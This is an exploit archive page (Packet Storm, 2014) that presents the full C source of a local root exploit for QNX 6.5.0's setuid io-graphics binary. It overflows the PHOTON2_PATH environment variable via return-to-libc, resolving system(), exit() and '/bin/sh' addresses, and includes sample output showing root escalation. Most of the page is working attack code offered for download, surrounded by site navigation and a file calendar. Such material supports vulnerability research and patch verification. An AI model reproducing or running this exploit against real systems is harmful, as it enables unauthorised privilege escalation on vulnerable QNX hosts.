exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

QNX 6.5.0 x86 io-graphics Buffer Overflow

QNX 6.5.0 x86 io-graphics Buffer Overflow
Posted Mar 10, 2014
Authored by cenobyte

QNX version 6.5.0 x86 io-graphics local root exploit that leverages a buffer overflow vulnerability.

tags | exploit, overflow, x86, local, root
SHA-256 | 599feb2a83e57f9097abc6a63e81c1d71632e87f4c7b3b69c52d7312d2d62af9

QNX 6.5.0 x86 io-graphics Buffer Overflow

Change Mirror Download
/*
* QNX 6.5.0 x86 io-graphics local root exploit by cenobyte 2013
* <vincitamorpatriae@gmail.com>
*
* - vulnerability description:
* Setuid root /usr/photon/bin/io-graphics on QNX is prone to a buffer overflow.
* The vulnerability is due to insufficent bounds checking of the PHOTON2_HOME
* environment variable.
*
* - vulnerable platforms:
* QNX 6.5.0SP1
* QNX 6.5.0
* QNX 6.4.1
*
* - not vulnerable:
* QNX 6.3.0
*
* - exploit information:
* This is a return-to-libc exploit that yields euid=0. The addresses of
* system() and exit() are retrieved from libc using dlsym().
*
* The address of /bin/sh is retrieved by searching from address 0xb0300000.
*
* - example:
* $ uname -a
* QNX localhost 6.5.0 2010/07/09-14:44:03EDT x86pc x86
* $ id
* uid=100(user) gid=100
* $ ./qnx-io-graphics
* QNX io-graphics 6.5.0 x86 local root exploit by cenobyte 2013
* [-] system(): 0xb031bd80
* [-] exit(): 0xb032b5f0
* [-] /bin/sh: 0xb0374412
* # id
* uid=100(user) gid=100 euid=0(root)
*
*/

#include <dlfcn.h>
#include <err.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define VULN "PHOTON2_PATH="

static void fail(void);
static void checknull(unsigned int addr);
static unsigned int find_string(char *s);
static unsigned int find_libc(char *syscall);

void
checknull(unsigned int addr)
{
if (!(addr & 0xff) || \
!(addr & 0xff00) || \
!(addr & 0xff0000) || \
!(addr & 0xff000000))
errx(1, "return-to-libc failed: " \
"0x%x contains a null byte", addr);
}

void
fail(void)
{
printf("\n");
errx(1, "return-to-libc failed");
}

unsigned int
find_string(char *string)
{
unsigned int i;
char *a;

printf("[-] %s: ", string);

signal(SIGSEGV, fail);

for (i = 0xb0300000; i < 0xdeadbeef; i++) {
a = i;

if (strcmp(a, string) != 0)
continue;

printf("0x%x\n", i);
checknull(i);

return(i);
}

return(1);
}

unsigned int
find_libc(char *syscall)
{
void *s;
unsigned int syscall_addr;

if (!(s = dlopen(NULL, RTLD_LAZY)))
errx(1, "error: dlopen() failed");

if (!(syscall_addr = (unsigned int)dlsym(s, syscall)))
errx(1, "error: dlsym() %s", syscall);

printf("[-] %s(): 0x%x\n", syscall, syscall_addr);
checknull(syscall_addr);
return(syscall_addr);

return(1);
}

int
main()
{
unsigned int offset = 429;
unsigned int system_addr;
unsigned int exit_addr;
unsigned int binsh_addr;

char env[440];
char *prog[] = { "/usr/photon/bin/io-graphics", "io-graphics", NULL };
char *envp[] = { env, NULL };

printf("QNX 6.5.0 x86 io-graphics local root exploit by cenobyte 2013\n\n");

system_addr = find_libc("system");
exit_addr = find_libc("exit");
binsh_addr = find_string("/bin/sh");

memset(env, 0xEB, sizeof(env));
memcpy(env, VULN, strlen(VULN));
memcpy(env + offset, (char *)&system_addr, 4);
memcpy(env + offset + 4, (char *)&exit_addr, 4);
memcpy(env + offset + 8, (char *)&binsh_addr, 4);

execve(prog[0], prog, envp);

return(0);
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close